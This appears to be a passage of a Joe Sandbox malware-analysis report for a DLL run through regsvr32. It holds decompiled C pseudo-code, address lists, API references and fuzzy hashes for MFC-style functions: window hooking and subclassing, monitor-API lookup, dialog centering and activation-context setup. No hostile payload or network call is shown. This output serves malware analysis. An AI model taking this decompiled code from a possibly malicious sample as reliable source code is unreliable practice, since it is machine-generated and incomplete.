                                                                                                        					__eflags =  *(_t106 + 0x20) & 0x40000000;
                                                                                                        					if(( *(_t106 + 0x20) & 0x40000000) != 0) {
                                                                                                        						goto L27;
                                                                                                        					}
                                                                                                        					__eflags = _t56;
                                                                                                        					if(_t56 != 0) {
                                                                                                        						goto L27;
                                                                                                        					}
                                                                                                        					goto L7;
                                                                                                        				} else {
                                                                                                        					CallNextHookEx( *(_t54 + 0x28),  *(_t116 + 8), _t94, _t110);
                                                                                                        					L30:
                                                                                                        					return E10017C74(_t94, _t105, _t110);
                                                                                                        				}
                                                                                                        			}



























                                                                                                        0x10011389
                                                                                                        0x10011389
                                                                                                        0x10011389
                                                                                                        0x10011393
                                                                                                        0x10011398
                                                                                                        0x1001139b
                                                                                                        0x1001139e
                                                                                                        0x100113a8
                                                                                                        0x100113ae
                                                                                                        0x100113b5
                                                                                                        0x100113b7
                                                                                                        0x100113ba
                                                                                                        0x100113c0
                                                                                                        0x100113c2
                                                                                                        0x100113c4
                                                                                                        0x100113c4
                                                                                                        0x100113cd
                                                                                                        0x100113e2
                                                                                                        0x100113e4
                                                                                                        0x100113e7
                                                                                                        0x100113ec
                                                                                                        0x100113ee
                                                                                                        0x100113f2
                                                                                                        0x100113f8
                                                                                                        0x1001140f
                                                                                                        0x1001140f
                                                                                                        0x10011416
                                                                                                        0x10011463
                                                                                                        0x10011463
                                                                                                        0x10011465
                                                                                                        0x100114cd
                                                                                                        0x100114d5
                                                                                                        0x10011511
                                                                                                        0x1001151d
                                                                                                        0x10011524
                                                                                                        0x10011556
                                                                                                        0x10011559
                                                                                                        0x1001155f
                                                                                                        0x10011561
                                                                                                        0x10011564
                                                                                                        0x1001156c
                                                                                                        0x10011573
                                                                                                        0x10011575
                                                                                                        0x10011577
                                                                                                        0x1001157e
                                                                                                        0x10011586
                                                                                                        0x10011588
                                                                                                        0x1001158b
                                                                                                        0x1001158e
                                                                                                        0x1001159c
                                                                                                        0x1001159c
                                                                                                        0x1001158b
                                                                                                        0x10011577
                                                                                                        0x100115a2
                                                                                                        0x100115a8
                                                                                                        0x100115b4
                                                                                                        0x100115ba
                                                                                                        0x100115c1
                                                                                                        0x100115c3
                                                                                                        0x100115c8
                                                                                                        0x100115ce
                                                                                                        0x100115ce
                                                                                                        0x100115ce
                                                                                                        0x100115ce
                                                                                                        0x00000000
                                                                                                        0x100115d2
                                                                                                        0x00000000
                                                                                                        0x10011526
                                                                                                        0x100114d9
                                                                                                        0x100114e4
                                                                                                        0x100114ef
                                                                                                        0x100114f5
                                                                                                        0x100114fb
                                                                                                        0x100114fc
                                                                                                        0x100114fe
                                                                                                        0x10011506
                                                                                                        0x10011509
                                                                                                        0x1001150f
                                                                                                        0x10011535
                                                                                                        0x1001153b
                                                                                                        0x1001153d
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10011547
                                                                                                        0x1001154b
                                                                                                        0x10011550
                                                                                                        0x10011554
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10011554
                                                                                                        0x00000000
                                                                                                        0x1001150f
                                                                                                        0x1001146d
                                                                                                        0x10011472
                                                                                                        0x10011479
                                                                                                        0x10011482
                                                                                                        0x10011498
                                                                                                        0x1001149a
                                                                                                        0x100114a0
                                                                                                        0x100114a2
                                                                                                        0x100114a4
                                                                                                        0x100114a4
                                                                                                        0x100114ac
                                                                                                        0x100114b0
                                                                                                        0x100114b4
                                                                                                        0x100114b8
                                                                                                        0x100114be
                                                                                                        0x100114c1
                                                                                                        0x100114c3
                                                                                                        0x100114c3
                                                                                                        0x00000000
                                                                                                        0x100114b8
                                                                                                        0x1001141b
                                                                                                        0x10011421
                                                                                                        0x10011426
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1001142c
                                                                                                        0x1001142f
                                                                                                        0x10011434
                                                                                                        0x10011441
                                                                                                        0x10011445
                                                                                                        0x1001144b
                                                                                                        0x1001144b
                                                                                                        0x10011454
                                                                                                        0x10011459
                                                                                                        0x1001145c
                                                                                                        0x1001145d
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1001145d
                                                                                                        0x100113fa
                                                                                                        0x10011401
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10011407
                                                                                                        0x10011409
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x100113cf
                                                                                                        0x100113d7
                                                                                                        0x100115d4
                                                                                                        0x100115d9
                                                                                                        0x100115d9

                                                                                                        APIs
                                                                                                        • __EH_prolog3_GS.LIBCMT ref: 10011393
                                                                                                          • Part of subcall function 10013D98: __EH_prolog3.LIBCMT ref: 10013D9F
                                                                                                        • CallNextHookEx.USER32(?,?,?,?), ref: 100113D7
                                                                                                          • Part of subcall function 1000A0DB: __CxxThrowException@8.LIBCMT ref: 1000A0EF
                                                                                                          • Part of subcall function 1000A0DB: __EH_prolog3.LIBCMT ref: 1000A0FC
                                                                                                        • GetClassLongA.USER32 ref: 1001141B
                                                                                                        • GlobalGetAtomNameA.KERNEL32 ref: 10011445
                                                                                                        • SetWindowLongA.USER32(?,000000FC,Function_0001025C), ref: 1001149A
                                                                                                        • _memset.LIBCMT ref: 100114E4
                                                                                                        • GetClassLongA.USER32 ref: 10011514
                                                                                                        • GetClassNameA.USER32(?,?,00000100), ref: 10011535
                                                                                                        • GetWindowLongA.USER32 ref: 10011559
                                                                                                        • GetPropA.USER32 ref: 10011573
                                                                                                        • SetPropA.USER32 ref: 1001157E
                                                                                                        • GetPropA.USER32 ref: 10011586
                                                                                                        • GlobalAddAtomA.KERNEL32 ref: 1001158E
                                                                                                        • SetWindowLongA.USER32(?,000000FC,Function_00011245), ref: 1001159C
                                                                                                        • CallNextHookEx.USER32(?,00000003,?,?), ref: 100115B4
                                                                                                        • UnhookWindowsHookEx.USER32(?), ref: 100115C8
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.303760085.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.303755479.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303779838.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303789852.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303808490.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303813956.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303817812.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Long$ClassHookPropWindow$AtomCallGlobalH_prolog3NameNext$Exception@8H_prolog3_ThrowUnhookWindows_memset
                                                                                                        • String ID: #32768$AfxOldWndProc423$ime
                                                                                                        • API String ID: 1191297049-4034971020
                                                                                                        • Opcode ID: a59f08c89f11fe6b3e13f01d104cbc0d9868f5cf59dfadfd77116e560bc0dc28
                                                                                                        • Instruction ID: 45731ac5847e6eda9355a9c996fe1b8867c86b30351497dbe8ef7f26860efac9
                                                                                                        • Opcode Fuzzy Hash: a59f08c89f11fe6b3e13f01d104cbc0d9868f5cf59dfadfd77116e560bc0dc28
                                                                                                        • Instruction Fuzzy Hash: 09619E31900666EFEB14DB61CC49BDE7BA9EF483A1F214254F506AB191DB34DEC1CBA0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 97%
                                                                                                        			E1000D6C3() {
                                                                                                        				void* __ebx;
                                                                                                        				void* __esi;
                                                                                                        				struct HINSTANCE__* _t5;
                                                                                                        				_Unknown_base(*)()* _t6;
                                                                                                        				_Unknown_base(*)()* _t7;
                                                                                                        				_Unknown_base(*)()* _t8;
                                                                                                        				_Unknown_base(*)()* _t9;
                                                                                                        				_Unknown_base(*)()* _t10;
                                                                                                        				_Unknown_base(*)()* _t11;
                                                                                                        				_Unknown_base(*)()* _t12;
                                                                                                        				struct HINSTANCE__* _t18;
                                                                                                        				void* _t20;
                                                                                                        				intOrPtr _t23;
                                                                                                        				_Unknown_base(*)()* _t24;
                                                                                                        
                                                                                                        				_t23 =  *0x1005a76c; // 0x0
                                                                                                        				if(_t23 == 0) {
                                                                                                        					_push(_t20);
                                                                                                        					 *0x1005a770 = E1000D66B(0, _t20, __eflags);
                                                                                                        					_t18 = GetModuleHandleA("USER32");
                                                                                                        					__eflags = _t18;
                                                                                                        					if(_t18 == 0) {
                                                                                                        						L12:
                                                                                                        						 *0x1005a750 = 0;
                                                                                                        						 *0x1005a754 = 0;
                                                                                                        						 *0x1005a758 = 0;
                                                                                                        						 *0x1005a75c = 0;
                                                                                                        						 *0x1005a760 = 0;
                                                                                                        						 *0x1005a764 = 0;
                                                                                                        						 *0x1005a768 = 0;
                                                                                                        						_t5 = 0;
                                                                                                        					} else {
                                                                                                        						_t6 = GetProcAddress(_t18, "GetSystemMetrics");
                                                                                                        						__eflags = _t6;
                                                                                                        						 *0x1005a750 = _t6;
                                                                                                        						if(_t6 == 0) {
                                                                                                        							goto L12;
                                                                                                        						} else {
                                                                                                        							_t7 = GetProcAddress(_t18, "MonitorFromWindow");
                                                                                                        							__eflags = _t7;
                                                                                                        							 *0x1005a754 = _t7;
                                                                                                        							if(_t7 == 0) {
                                                                                                        								goto L12;
                                                                                                        							} else {
                                                                                                        								_t8 = GetProcAddress(_t18, "MonitorFromRect");
                                                                                                        								__eflags = _t8;
                                                                                                        								 *0x1005a758 = _t8;
                                                                                                        								if(_t8 == 0) {
                                                                                                        									goto L12;
                                                                                                        								} else {
                                                                                                        									_t9 = GetProcAddress(_t18, "MonitorFromPoint");
                                                                                                        									__eflags = _t9;
                                                                                                        									 *0x1005a75c = _t9;
                                                                                                        									if(_t9 == 0) {
                                                                                                        										goto L12;
                                                                                                        									} else {
                                                                                                        										_t10 = GetProcAddress(_t18, "EnumDisplayMonitors");
                                                                                                        										__eflags = _t10;
                                                                                                        										 *0x1005a764 = _t10;
                                                                                                        										if(_t10 == 0) {
                                                                                                        											goto L12;
                                                                                                        										} else {
                                                                                                        											_t11 = GetProcAddress(_t18, "GetMonitorInfoA");
                                                                                                        											__eflags = _t11;
                                                                                                        											 *0x1005a760 = _t11;
                                                                                                        											if(_t11 == 0) {
                                                                                                        												goto L12;
                                                                                                        											} else {
                                                                                                        												_t12 = GetProcAddress(_t18, "EnumDisplayDevicesA");
                                                                                                        												__eflags = _t12;
                                                                                                        												 *0x1005a768 = _t12;
                                                                                                        												if(_t12 == 0) {
                                                                                                        													goto L12;
                                                                                                        												} else {
                                                                                                        													_t5 = 1;
                                                                                                        													__eflags = 1;
                                                                                                        												}
                                                                                                        											}
                                                                                                        										}
                                                                                                        									}
                                                                                                        								}
                                                                                                        							}
                                                                                                        						}
                                                                                                        					}
                                                                                                        					 *0x1005a76c = 1;
                                                                                                        					return _t5;
                                                                                                        				} else {
                                                                                                        					_t24 =  *0x1005a760; // 0x0
                                                                                                        					return 0 | _t24 != 0x00000000;
                                                                                                        				}
                                                                                                        			}

















                                                                                                        0x1000d6c6
                                                                                                        0x1000d6cc
                                                                                                        0x1000d6db
                                                                                                        0x1000d6e7
                                                                                                        0x1000d6f2
                                                                                                        0x1000d6f4
                                                                                                        0x1000d6f6
                                                                                                        0x1000d78a
                                                                                                        0x1000d78a
                                                                                                        0x1000d790
                                                                                                        0x1000d796
                                                                                                        0x1000d79c
                                                                                                        0x1000d7a2
                                                                                                        0x1000d7a8
                                                                                                        0x1000d7ae
                                                                                                        0x1000d7b4
                                                                                                        0x1000d6fc
                                                                                                        0x1000d708
                                                                                                        0x1000d70a
                                                                                                        0x1000d70c
                                                                                                        0x1000d711
                                                                                                        0x00000000
                                                                                                        0x1000d713
                                                                                                        0x1000d719
                                                                                                        0x1000d71b
                                                                                                        0x1000d71d
                                                                                                        0x1000d722
                                                                                                        0x00000000
                                                                                                        0x1000d724
                                                                                                        0x1000d72a
                                                                                                        0x1000d72c
                                                                                                        0x1000d72e
                                                                                                        0x1000d733
                                                                                                        0x00000000
                                                                                                        0x1000d735
                                                                                                        0x1000d73b
                                                                                                        0x1000d73d
                                                                                                        0x1000d73f
                                                                                                        0x1000d744
                                                                                                        0x00000000
                                                                                                        0x1000d746
                                                                                                        0x1000d74c
                                                                                                        0x1000d74e
                                                                                                        0x1000d750
                                                                                                        0x1000d755
                                                                                                        0x00000000
                                                                                                        0x1000d757
                                                                                                        0x1000d75d
                                                                                                        0x1000d75f
                                                                                                        0x1000d761
                                                                                                        0x1000d766
                                                                                                        0x00000000
                                                                                                        0x1000d768
                                                                                                        0x1000d76e
                                                                                                        0x1000d770
                                                                                                        0x1000d772
                                                                                                        0x1000d777
                                                                                                        0x00000000
                                                                                                        0x1000d779
                                                                                                        0x1000d77b
                                                                                                        0x1000d77b
                                                                                                        0x1000d77b
                                                                                                        0x1000d777
                                                                                                        0x1000d766
                                                                                                        0x1000d755
                                                                                                        0x1000d744
                                                                                                        0x1000d733
                                                                                                        0x1000d722
                                                                                                        0x1000d711
                                                                                                        0x1000d77e
                                                                                                        0x1000d789
                                                                                                        0x1000d6ce
                                                                                                        0x1000d6d0
                                                                                                        0x1000d6da
                                                                                                        0x1000d6da

                                                                                                        APIs
                                                                                                        • GetModuleHandleA.KERNEL32(USER32,00000000,00000000,76925D80,1000D80F,?,?,?,?,?,?,?,1000F61E,00000000,00000002,00000028), ref: 1000D6EC
                                                                                                        • GetProcAddress.KERNEL32(00000000,GetSystemMetrics), ref: 1000D708
                                                                                                        • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 1000D719
                                                                                                        • GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 1000D72A
                                                                                                        • GetProcAddress.KERNEL32(00000000,MonitorFromPoint), ref: 1000D73B
                                                                                                        • GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors), ref: 1000D74C
                                                                                                        • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 1000D75D
                                                                                                        • GetProcAddress.KERNEL32(00000000,EnumDisplayDevicesA), ref: 1000D76E
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.303760085.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.303755479.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303779838.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303789852.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303808490.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303813956.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303817812.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AddressProc$HandleModule
                                                                                                        • String ID: EnumDisplayDevicesA$EnumDisplayMonitors$GetMonitorInfoA$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32
                                                                                                        • API String ID: 667068680-68207542
                                                                                                        • Opcode ID: ee0e5f062bbe94e4a9e7c06d78520802f13055058268d31d10b74b4948bb3027
                                                                                                        • Instruction ID: 93615fb53cb164fe7f3d347b700eade87a81924dee4312457033af375ccc55a3
                                                                                                        • Opcode Fuzzy Hash: ee0e5f062bbe94e4a9e7c06d78520802f13055058268d31d10b74b4948bb3027
                                                                                                        • Instruction Fuzzy Hash: 7921E3B19097699BE701EF369DC856DBAF5F34F281391453FE109D2528EB3884C6EE20
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 89%
                                                                                                        			E1000F530(void* __ebx, intOrPtr __ecx, void* __edx, intOrPtr _a4) {
                                                                                                        				signed int _v8;
                                                                                                        				intOrPtr _v12;
                                                                                                        				struct tagRECT _v28;
                                                                                                        				struct tagRECT _v44;
                                                                                                        				struct tagRECT _v60;
                                                                                                        				struct tagRECT _v80;
                                                                                                        				char _v100;
                                                                                                        				void* __edi;
                                                                                                        				intOrPtr _t58;
                                                                                                        				struct HWND__* _t59;
                                                                                                        				intOrPtr _t94;
                                                                                                        				signed int _t103;
                                                                                                        				struct HWND__* _t104;
                                                                                                        				void* _t105;
                                                                                                        				struct HWND__* _t107;
                                                                                                        				long _t108;
                                                                                                        				long _t116;
                                                                                                        				void* _t119;
                                                                                                        				struct HWND__* _t121;
                                                                                                        				void* _t123;
                                                                                                        				intOrPtr _t125;
                                                                                                        				intOrPtr _t129;
                                                                                                        
                                                                                                        				_t119 = __edx;
                                                                                                        				_t105 = __ebx;
                                                                                                        				_t125 = __ecx;
                                                                                                        				_v12 = __ecx;
                                                                                                        				_v8 = E10012862(__ecx);
                                                                                                        				_t58 = _a4;
                                                                                                        				if(_t58 == 0) {
                                                                                                        					if((_v8 & 0x40000000) == 0) {
                                                                                                        						_t59 = GetWindow( *(__ecx + 0x20), 4);
                                                                                                        					} else {
                                                                                                        						_t59 = GetParent( *(__ecx + 0x20));
                                                                                                        					}
                                                                                                        					_t121 = _t59;
                                                                                                        					if(_t121 != 0) {
                                                                                                        						_t104 = SendMessageA(_t121, 0x36b, 0, 0);
                                                                                                        						if(_t104 != 0) {
                                                                                                        							_t121 = _t104;
                                                                                                        						}
                                                                                                        					}
                                                                                                        				} else {
                                                                                                        					_t4 = _t58 + 0x20; // 0xc033d88b
                                                                                                        					_t121 =  *_t4;
                                                                                                        				}
                                                                                                        				_push(_t105);
                                                                                                        				GetWindowRect( *(_t125 + 0x20),  &_v60);
                                                                                                        				if((_v8 & 0x40000000) != 0) {
                                                                                                        					_t107 = GetParent( *(_t125 + 0x20));
                                                                                                        					GetClientRect(_t107,  &_v28);
                                                                                                        					GetClientRect(_t121,  &_v44);
                                                                                                        					MapWindowPoints(_t121, _t107,  &_v44, 2);
                                                                                                        				} else {
                                                                                                        					if(_t121 != 0) {
                                                                                                        						_t103 = GetWindowLongA(_t121, 0xfffffff0);
                                                                                                        						if((_t103 & 0x10000000) == 0 || (_t103 & 0x20000000) != 0) {
                                                                                                        							_t121 = 0;
                                                                                                        						}
                                                                                                        					}
                                                                                                        					_v100 = 0x28;
                                                                                                        					if(_t121 != 0) {
                                                                                                        						GetWindowRect(_t121,  &_v44);
                                                                                                        						E1000D86F(_t121, E1000D804(_t121, 2),  &_v100);
                                                                                                        						CopyRect( &_v28,  &_v80);
                                                                                                        					} else {
                                                                                                        						_t94 = E1000A7CE();
                                                                                                        						if(_t94 != 0) {
                                                                                                        							_t94 =  *((intOrPtr*)(_t94 + 0x20));
                                                                                                        						}
                                                                                                        						E1000D86F(_t121, E1000D804(_t94, 1),  &_v100);
                                                                                                        						CopyRect( &_v44,  &_v80);
                                                                                                        						CopyRect( &_v28,  &_v80);
                                                                                                        					}
                                                                                                        				}
                                                                                                        				_t108 = _v60.left;
                                                                                                        				asm("cdq");
                                                                                                        				_t123 = _v60.right - _t108;
                                                                                                        				asm("cdq");
                                                                                                        				_t120 = _v44.bottom;
                                                                                                        				_t116 = (_v44.left + _v44.right - _t119 >> 1) - (_t123 - _t119 >> 1);
                                                                                                        				_a4 = _v60.bottom - _v60.top;
                                                                                                        				asm("cdq");
                                                                                                        				asm("cdq");
                                                                                                        				_t129 = (_v44.top + _v44.bottom - _v44.bottom >> 1) - (_a4 - _t120 >> 1);
                                                                                                        				if(_t116 >= _v28.left) {
                                                                                                        					if(_t123 + _t116 > _v28.right) {
                                                                                                        						_t116 = _t108 - _v60.right + _v28.right;
                                                                                                        					}
                                                                                                        				} else {
                                                                                                        					_t116 = _v28.left;
                                                                                                        				}
                                                                                                        				if(_t129 >= _v28.top) {
                                                                                                        					if(_a4 + _t129 > _v28.bottom) {
                                                                                                        						_t129 = _v60.top - _v60.bottom + _v28.bottom;
                                                                                                        					}
                                                                                                        				} else {
                                                                                                        					_t129 = _v28.top;
                                                                                                        				}
                                                                                                        				return E1001297A(_v12, 0, _t116, _t129, 0xffffffff, 0xffffffff, 0x15);
                                                                                                        			}

























                                                                                                        0x1000f530
                                                                                                        0x1000f530
                                                                                                        0x1000f537
                                                                                                        0x1000f53a
                                                                                                        0x1000f542
                                                                                                        0x1000f545
                                                                                                        0x1000f54a
                                                                                                        0x1000f558
                                                                                                        0x1000f56a
                                                                                                        0x1000f55a
                                                                                                        0x1000f55d
                                                                                                        0x1000f55d
                                                                                                        0x1000f570
                                                                                                        0x1000f574
                                                                                                        0x1000f580
                                                                                                        0x1000f588
                                                                                                        0x1000f58a
                                                                                                        0x1000f58a
                                                                                                        0x1000f588
                                                                                                        0x1000f54c
                                                                                                        0x1000f54c
                                                                                                        0x1000f54c
                                                                                                        0x1000f54c
                                                                                                        0x1000f58c
                                                                                                        0x1000f59a
                                                                                                        0x1000f5a3
                                                                                                        0x1000f643
                                                                                                        0x1000f64a
                                                                                                        0x1000f651
                                                                                                        0x1000f65b
                                                                                                        0x1000f5a9
                                                                                                        0x1000f5ab
                                                                                                        0x1000f5b0
                                                                                                        0x1000f5bb
                                                                                                        0x1000f5c4
                                                                                                        0x1000f5c4
                                                                                                        0x1000f5bb
                                                                                                        0x1000f5c8
                                                                                                        0x1000f5cf
                                                                                                        0x1000f610
                                                                                                        0x1000f61f
                                                                                                        0x1000f62c
                                                                                                        0x1000f5d1
                                                                                                        0x1000f5d1
                                                                                                        0x1000f5d8
                                                                                                        0x1000f5da
                                                                                                        0x1000f5da
                                                                                                        0x1000f5ea
                                                                                                        0x1000f5fd
                                                                                                        0x1000f607
                                                                                                        0x1000f607
                                                                                                        0x1000f5cf
                                                                                                        0x1000f66a
                                                                                                        0x1000f66f
                                                                                                        0x1000f674
                                                                                                        0x1000f678
                                                                                                        0x1000f67b
                                                                                                        0x1000f682
                                                                                                        0x1000f68a
                                                                                                        0x1000f692
                                                                                                        0x1000f69a
                                                                                                        0x1000f6a1
                                                                                                        0x1000f6a6
                                                                                                        0x1000f6b2
                                                                                                        0x1000f6ba
                                                                                                        0x1000f6ba
                                                                                                        0x1000f6a8
                                                                                                        0x1000f6a8
                                                                                                        0x1000f6a8
                                                                                                        0x1000f6c0
                                                                                                        0x1000f6cf
                                                                                                        0x1000f6d7
                                                                                                        0x1000f6d7
                                                                                                        0x1000f6c2
                                                                                                        0x1000f6c2
                                                                                                        0x1000f6c2
                                                                                                        0x1000f6ef

                                                                                                        APIs
                                                                                                          • Part of subcall function 10012862: GetWindowLongA.USER32 ref: 1001286D
                                                                                                        • GetParent.USER32(?), ref: 1000F55D
                                                                                                        • SendMessageA.USER32(00000000,0000036B,00000000,00000000), ref: 1000F580
                                                                                                        • GetWindowRect.USER32 ref: 1000F59A
                                                                                                        • GetWindowLongA.USER32 ref: 1000F5B0
                                                                                                        • CopyRect.USER32 ref: 1000F5FD
                                                                                                        • CopyRect.USER32 ref: 1000F607
                                                                                                        • GetWindowRect.USER32 ref: 1000F610
                                                                                                        • CopyRect.USER32 ref: 1000F62C
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.303760085.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.303755479.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303779838.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303789852.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303808490.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303813956.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303817812.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Rect$Window$Copy$Long$MessageParentSend
                                                                                                        • String ID: (
                                                                                                        • API String ID: 808654186-3887548279
                                                                                                        • Opcode ID: 7a74a446788f1e642fa1c3aef1600eb5c5d71207166799e974e91dfaab450861
                                                                                                        • Instruction ID: 3f3129d87232bc90929dbfd76231b55f7e5f3d8dd267dcccc126c4261812b80e
                                                                                                        • Opcode Fuzzy Hash: 7a74a446788f1e642fa1c3aef1600eb5c5d71207166799e974e91dfaab450861
                                                                                                        • Instruction Fuzzy Hash: 84517072900619AFEB00DFA8CC85EEEBBB9EF48290F154119FA05F3594DB30ED419B60
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 100%
                                                                                                        			E1000A1F9(intOrPtr* __ecx, void* __esi, intOrPtr _a4) {
                                                                                                        				void* __ebx;
                                                                                                        				void* __edi;
                                                                                                        				void* __ebp;
                                                                                                        				_Unknown_base(*)()* _t9;
                                                                                                        				struct HINSTANCE__* _t15;
                                                                                                        				void* _t16;
                                                                                                        				intOrPtr* _t18;
                                                                                                        				char _t19;
                                                                                                        				intOrPtr _t21;
                                                                                                        				_Unknown_base(*)()* _t22;
                                                                                                        				_Unknown_base(*)()* _t23;
                                                                                                        
                                                                                                        				_t16 = __esi;
                                                                                                        				_t12 = __ecx;
                                                                                                        				_t18 = __ecx;
                                                                                                        				 *__ecx = _a4;
                                                                                                        				_a4 = 0;
                                                                                                        				_t19 =  *0x10058f2c; // 0x0
                                                                                                        				if(_t19 == 0) {
                                                                                                        					_t15 = GetModuleHandleA("KERNEL32");
                                                                                                        					_t20 = _t15;
                                                                                                        					if(_t15 == 0) {
                                                                                                        						L2:
                                                                                                        						E1000A0DB(0, _t12, _t15, _t16, _t20);
                                                                                                        					}
                                                                                                        					 *0x10058f1c = GetProcAddress(_t15, "CreateActCtxA");
                                                                                                        					 *0x10058f20 = GetProcAddress(_t15, "ReleaseActCtx");
                                                                                                        					 *0x10058f24 = GetProcAddress(_t15, "ActivateActCtx");
                                                                                                        					_t9 = GetProcAddress(_t15, "DeactivateActCtx");
                                                                                                        					_t21 =  *0x10058f1c; // 0x0
                                                                                                        					 *0x10058f28 = _t9;
                                                                                                        					_t16 = _t16;
                                                                                                        					if(_t21 == 0) {
                                                                                                        						__eflags =  *0x10058f20; // 0x0
                                                                                                        						if(__eflags != 0) {
                                                                                                        							goto L2;
                                                                                                        						} else {
                                                                                                        							__eflags =  *0x10058f24; // 0x0
                                                                                                        							if(__eflags != 0) {
                                                                                                        								goto L2;
                                                                                                        							} else {
                                                                                                        								__eflags = _t9;
                                                                                                        								if(__eflags != 0) {
                                                                                                        									goto L2;
                                                                                                        								}
                                                                                                        							}
                                                                                                        						}
                                                                                                        					} else {
                                                                                                        						_t22 =  *0x10058f20; // 0x0
                                                                                                        						if(_t22 == 0) {
                                                                                                        							goto L2;
                                                                                                        						} else {
                                                                                                        							_t23 =  *0x10058f24; // 0x0
                                                                                                        							if(_t23 == 0) {
                                                                                                        								goto L2;
                                                                                                        							} else {
                                                                                                        								_t20 = _t9;
                                                                                                        								if(_t9 == 0) {
                                                                                                        									goto L2;
                                                                                                        								}
                                                                                                        							}
                                                                                                        						}
                                                                                                        					}
                                                                                                        					 *0x10058f2c = 1;
                                                                                                        				}
                                                                                                        				return _t18;
                                                                                                        			}














                                                                                                        0x1000a1f9
                                                                                                        0x1000a1f9
                                                                                                        0x1000a1ff
                                                                                                        0x1000a203
                                                                                                        0x1000a206
                                                                                                        0x1000a209
                                                                                                        0x1000a210
                                                                                                        0x1000a221
                                                                                                        0x1000a223
                                                                                                        0x1000a225
                                                                                                        0x1000a227
                                                                                                        0x1000a227
                                                                                                        0x1000a227
                                                                                                        0x1000a241
                                                                                                        0x1000a24e
                                                                                                        0x1000a25b
                                                                                                        0x1000a260
                                                                                                        0x1000a262
                                                                                                        0x1000a268
                                                                                                        0x1000a26d
                                                                                                        0x1000a26e
                                                                                                        0x1000a286
                                                                                                        0x1000a28c
                                                                                                        0x00000000
                                                                                                        0x1000a28e
                                                                                                        0x1000a28e
                                                                                                        0x1000a294
                                                                                                        0x00000000
                                                                                                        0x1000a296
                                                                                                        0x1000a296
                                                                                                        0x1000a298
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1000a298
                                                                                                        0x1000a294
                                                                                                        0x1000a270
                                                                                                        0x1000a270
                                                                                                        0x1000a276
                                                                                                        0x00000000
                                                                                                        0x1000a278
                                                                                                        0x1000a278
                                                                                                        0x1000a27e
                                                                                                        0x00000000
                                                                                                        0x1000a280
                                                                                                        0x1000a280
                                                                                                        0x1000a282
                                                                                                        0x00000000
                                                                                                        0x1000a284
                                                                                                        0x1000a282
                                                                                                        0x1000a27e
                                                                                                        0x1000a276
                                                                                                        0x1000a29a
                                                                                                        0x1000a29a
                                                                                                        0x1000a2a6

                                                                                                        APIs
                                                                                                        • GetModuleHandleA.KERNEL32(KERNEL32,00000000,?,00000020,1000ACB1,000000FF), ref: 1000A21B
                                                                                                        • GetProcAddress.KERNEL32(00000000,CreateActCtxA), ref: 1000A239
                                                                                                        • GetProcAddress.KERNEL32(00000000,ReleaseActCtx), ref: 1000A246
                                                                                                        • GetProcAddress.KERNEL32(00000000,ActivateActCtx), ref: 1000A253
                                                                                                        • GetProcAddress.KERNEL32(00000000,DeactivateActCtx), ref: 1000A260
                                                                                                        Strings
                                                                                                        Memory Dump Source
